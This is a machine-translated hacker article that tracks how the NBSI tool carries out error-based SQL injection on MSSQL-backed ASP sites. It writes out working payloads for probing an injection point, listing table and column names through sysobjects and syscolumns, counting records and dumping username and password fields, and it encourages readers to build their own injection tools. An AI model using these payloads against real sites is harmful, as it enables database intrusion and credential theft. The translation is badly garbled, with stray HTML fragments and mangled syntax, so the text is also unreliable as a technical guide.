NBSI Injection Analysis and tracking report (MSSQL)
Source: emotional network Author: Softbug
Preface:
Writing a good tool is not easy, but writing an injection tool is not easy. This article systematically analyzes the testing ideas of Niu Ren by tracking the injection process of NBSI. It is helpful for manual analysis. It is also an appreciation for injection attacks to carefully track the NBSI spying results.
First, we found an IT site for testing. The test directory was only used to track NBSI's spying ideas and never maliciously damaged the website!
1 Injection Point Detection
Suppose the injection point is: http://www.xxx.com/zhuru.asp? Id = 1
So NBSI will first test the connection: http://www.xxx.com/zhuru.asp? Id = 1 and user % 2 bchar (124)> 0
At first, I don't understand why it should be called a Char (124). This value is actually a "|" symbol. We will talk about it later.
Of course, in this case, IIS will report an error and return an internal error number of 500. Maybe the author will use this as the basis.
3. Name of the table to be guessed
Tracking found that the author can complete the guessing of a table name in one sentence, which is indeed very efficient. The specific table name prediction code is:
And (select Top 1 cast (name as varchar (8000) from (select Top 1 id, name from sysobjects where xtype = char (85) order by id) T order by id desc)> 0
Have you seen the Red 1? This is the value of the Table Name of the data table! If it is the first table, of course it is 1. If it is the first table, then this 1 is changed to 2, and so on.
How can we determine that the table name has been guessed? This is simple. We can find that, as long as the table name value X and X + 1 return the same value, it means that the prediction is complete.
5. Name of the predicted Column
Tracking found that the author used a single sentence to complete the guessing of a table name. Maybe this is the benefit of MSSQL! An accesskey may also require a letter or a letter to guess. The code for the specific name of the column to be guessed is:
And (select Top 1 cast (name as varchar (8000) from (select Top 1 colid, name From syscolumns where id = OBJECT_ID (NCHAR (78) % 2 BNCHAR (101) % 2 BNCHAR (119) % 2 BNCHAR (115) % 2 BNCHAR (95) % 2 BNCHAR (85) % 2 BNCHAR (115) % 2 BNCHAR (101) % 2 BNCHAR (114) Order by colid) T Order by colid desc)> 0
Do you see the red 1? This indicates that we want to guess the Sequence Value of the column name. If you change to 2, you need to guess 2nd column names. The Method for Determining the end of a table name is the same as that for determining the end of a table name.
Note:
NCHAR (78) % 2 BNCHAR (101) % 2 BNCHAR (119) % 2 BNCHAR (115) % 2 BNCHAR (95) % 2 BNCHAR (85) % 2 BNCHAR (115) % 2 BNCHAR (101) % 2 BNCHAR (114)
|
To eliminate the limitations of symbols, the author tries to use Nchar to connect the string value of the table name. The above data actually represents the string value of a table. The number in the brackets is the characters ASC code.
Example:
If we want to guess the table name xfiletd, we just need to use the HUIE plug-in to convert it!
See:
Screen. width-300) this. width = screen. width-300 "border = 0>
We get the following characters:
Nchar (78) % 2 bnchar (66) % 2 bnchar (69) % 2 bnchar (6C) % 2 bnchar (65) % 2 bnchar (74) % 2 bnchar (75)
|
Haha! Fast!
6. Guess data
Next, let's take a look at how NBSI guessed the data. The truth is that it should be "violent". Let's look forward to seeing how cool people make violent data.
1) obtain the number of records for the Field
And % 20 (select % 20 cast (Count (1) % 20as % 20 varchar (8000) % 2 Bchar (97) % 20 From % 20 [News_Style] % 20 where % 201 = 1)> 0
|
The red News_Style represents the name of the table to be guessed. Here, the author uses a common violent table technique. After we get the number of fields, the field is an INT type value, and no type conversion error will occur when comparing it with 0. In other words, the record will not automatically "trick ". If we connect it to Char (97) // character a when comparing it with 0, then what we get will be a string. When compared with zero, a value such as "number of records" + a is generated. Now everyone should understand why the first-step spying should add a "|" symbol! The answer is answered.
Screen. width-300) this. width = screen. width-300 "border = 0>
2) obtain the field value.
The number of records is obtained, and then the field value is repeatedly exposed. Fortunately, the author has no special tricks. The author's code is:
And (select Top 1 isNull (cast ([sName] as varchar (8000), char (32) % 2 Bchar (124) from (select Top 9 sName From [News_Style] where 1 = 1 Order by sName) T Order by sName desc)> 0
|
The red news_style is the name of the data table to be guessed. The green 9 indicates that the value of the 9th record in the sname field is to be obtained. Loop several times, haha! The data is ready.
Note: char (124. It also aims to convert all the data to the string type, compare it with the int type, and then expose the data. The reason is as described above! This is why NBSI has a "|" value in the obtained field. The author may be too lazy to handle it. :-)
Screen. width-300) this. width = screen. width-300 "border = 0>
Have you seen it? There is a "|" symbol.
3) double data and N data guesses
You may think that it is really good to track and analyze the value of the data field in NBSI. Suppose we want to guess the values of two fields in a table. So how do we write code?
The Code of NBSI is written as follows:
The first step is to use 1) to obtain the number of records.
The second step is to use:
And (select Top 1 isNull (cast ([UserName] as varchar (8000), char (32) % 2 Bchar (124) % 2 BisNull (cast ([PassWord] as varchar (8000), char (32) From (select Top 1 UserName, passWord From [News_User] where 1 = 1 Order by UserName, PassWord) T Order by UserName desc, PassWord desc)> 0
|
Screen. width-300) this. width = screen. width-300 "border = 0>
(Note | the symbols are separated by two values)
News_user is a table name. I will not explain it much if it is Char (124. You can compare the above statements with the statements in 2) According to the cat's image. I want to see how the author has a multi-field value. If you are happy, it doesn't matter whether the database value is exposed once. Here, we will indirectly remind you that the network overhead of a field cannot be much different from the network overhead of all values, remember to put all the values on the next time you play NBSI! J
Summary: Friends who hope to complete their own VB code may write programs based on our analysis results, and you will also have your own NBSI. Today's HUIE has such a function. I hope you can visit www.hack0.net.
Descending order:
The most important thing to write a program is the programming idea. You may only see part of the details of writing a good program. I don't know. How does NBSI determine whether a website can be injected? In fact, SQL brute-force error alone is just a thought. Two ideas NBSI offers are as follows:
2. Check that the IIS header is based on the normal 200,101 response. If 500 is returned, an error is returned.
3. Judge IIS return information one by one, and then compare whether there is a possibility of injection! (Because the HTML information returned by some websites is very large! It is still very time-consuming to judge with the program, not recommended)
We still need to learn more. It is not just a brute-force database, but an injection.
NBSI is actually a very large project software, and our analysis is completely completed in the State where the IIS error prompt is enabled. The "digital" injection method is also used. Limitations are a bit. We will continue to follow up to fully explore NBSI injection ideas. The judgment of Access injection may be a difficult and annoying programming project. You changed it. Can you write it? NBSI is still flawed in many aspects. After reading our articles, you may be able to write more excellent NB files. If you are interested, you can continue to follow our NBSI analysis report. More Interested people are welcome to write their own small network plug-ins and send them to www. h.
